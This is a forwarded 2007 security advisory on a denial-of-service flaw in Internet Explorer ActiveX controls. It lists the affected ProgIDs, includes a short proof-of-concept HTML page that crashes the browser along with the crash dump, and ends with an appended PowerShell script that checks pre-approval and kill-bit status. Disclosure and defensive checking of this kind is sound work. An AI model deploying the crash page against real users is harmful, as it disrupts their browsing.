Thread-topic: [NT] Internet Explorer ActiveX bgColor Property DoS
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Monday, January 29, 2007 12:43 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Internet Explorer ActiveX bgColor Property DoS
>
> Internet Explorer ActiveX bgColor Property DoS
>
> Determina Security Research has discovered a denial of
> service vulnerability in multiple ActiveX controls included
> in Internet Explorer. This vulnerability can be exploited by
> a malicious web page and results in a termination of the
> Internet Explorer process. Our analysis indicates that remote
> code execution is unlikely. The vulnerable ActiveX controls
> are installed by default with all versions of Internet
> Explorer on Windows 2000, XP, 2003 and Vista.
>
>
> This vulnerability was found by a fuzzer that instantiates
> all ActiveX controls on the system and enumerates their
> properties. We discovered multiple controls that crash with
> an invalid memory access exception when certain object
> properties are accessed through JavaScript. Most of the
> vulnerable ActiveX controls are in MSHTML.DLL and are
> exploitable on all versions of Internet Explorer. Their
> ProgIDs are given below:
>
> giffile
> htmlfile
> jpegfile
> mhtmlfile
> ODCfile
> pjpegfile
> pngfile
> xbmfile
> xmlfile
> xslfile
> wdpfile
>
> The following two controls in TRIEDIT.DLL are exploitable
> without user interaction only on Internet Explorer 5 and 6:
>
> TriEditDocument.TriEditDocument
> TriEditDocument.TriEditDocument.1
>
> Accessing one of the bgColor, fgColor, linkColor, alinkColor,
> vlinkColor or defaultCharset properties of the controls
> listed above results in a NULL pointer dereference and an
> unhandled memory access violation. It is hard to tell what
> the root cause and full impact of this vulnerability are, but
> remote code execution seems unlikely at this point.
>
> Microsoft has taken steps to minimize the attack surface
> presented by the ActiveX controls in Internet Explorer 7. The
> ActiveX Opt-In feature prevents previously unused ActiveX
> controls from running, unless the user explicitly allows
> their instantiation. The only controls that can run without
> prompting the user are the ones included on a pre-approved
> list in the system registry. All vulnerable MSHTML.DLL
> controls listed above are on the pre-approved list, allowing
> the vulnerability to be exploited with no user interaction on
> IE7 running on both Windows XP and Vista.
>
> Proof of Concept:
>
> The following .HTML file will trigger the vulnerability:
>
> <html>
> <body>
> <script language="JavaScript">
> obj = new ActiveXObject("giffile");
> obj.bgColor;
> </script>
> </body>
> </html>
>
> Opening the file in Internet Explorer results in the
> following NULL-pointer dereference:
>
> (a9c.72c): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=7ded51fc ecx=01253b90 edx=00000000
> esi=00038ff8 edi=01253c40
> eip=7dda1dde esp=0013dfb0 ebp=0013dfbc iopl=0 nv up ei pl nz na pe nc
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
> mshtml!CDocument::get_bgColor+0x7e:
> 7dda1dde ff30 push dword ptr [eax] ds:0023:00000000=????????
>
>
> Additional Information:
> The information has been provided by Alexander Sotirov
> <mailto:asotirov@xxxxxxxxxxxxx>.
> The original article can be found at:
> http://www.determina.com/security.research/vulnerabilities/activex-bgcolor.html
>
>
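A defender-side inventory check, added here and not part of the SecuriTeam advisory or Determina's research: it resolves each ProgID the advisory lists to its CLSID and reports whether that CLSID sits on IE7's ActiveX Opt-In pre-approved list (the mechanism the advisory says lets the MSHTML controls run without prompting) and whether a kill bit blocks it. It assumes the standard registry locations for the pre-approved list and the ActiveX Compatibility flags, which the advisory mentions only in general terms, and it needs PowerShell 3 or later.

```powershell
# Added example (not the advisory's own code). Registry paths below are the
# standard IE locations for Opt-In pre-approval and ActiveX kill bits; they are
# assumptions here because the advisory does not name the keys.
function Get-AdvisoryControlStatus {
    # ProgIDs exactly as listed in the advisory
    $progIds = 'giffile','htmlfile','jpegfile','mhtmlfile','ODCfile','pjpegfile',
               'pngfile','xbmfile','xmlfile','xslfile','wdpfile',
               'TriEditDocument.TriEditDocument','TriEditDocument.TriEditDocument.1'

    $preApproved = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved'
    $compat      = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
    $KILL_BIT    = 0x400   # "Compatibility Flags" bit that stops IE loading a control

    foreach ($progId in $progIds) {
        $clsidKey = "Registry::HKEY_CLASSES_ROOT\$progId\CLSID"
        if (-not (Test-Path $clsidKey)) {
            # ProgID not registered on this host (e.g. TriEdit absent on IE7)
            [pscustomobject]@{ ProgID = $progId; CLSID = '(not registered)';
                               PreApproved = $false; KillBit = $false }
            continue
        }
        $clsid = (Get-ItemProperty -Path $clsidKey).'(default)'

        # On the pre-approved list => runs under IE7 Opt-In with no prompt
        $isPreApproved = Test-Path (Join-Path $preApproved $clsid)

        # Kill bit set => IE refuses to instantiate the control at all
        $flags = 0
        $compatKey = Join-Path $compat $clsid
        if (Test-Path $compatKey) {
            $flags = [int](Get-ItemProperty -Path $compatKey).'Compatibility Flags'
        }

        [pscustomobject]@{
            ProgID      = $progId
            CLSID       = $clsid
            PreApproved = $isPreApproved
            KillBit     = (($flags -band $KILL_BIT) -ne 0)
        }
    }
}

Get-AdvisoryControlStatus | Format-Table -AutoSize
```

Run it elevated on an affected host; a row showing PreApproved=True and KillBit=False is a control that a web page can reach without any prompt.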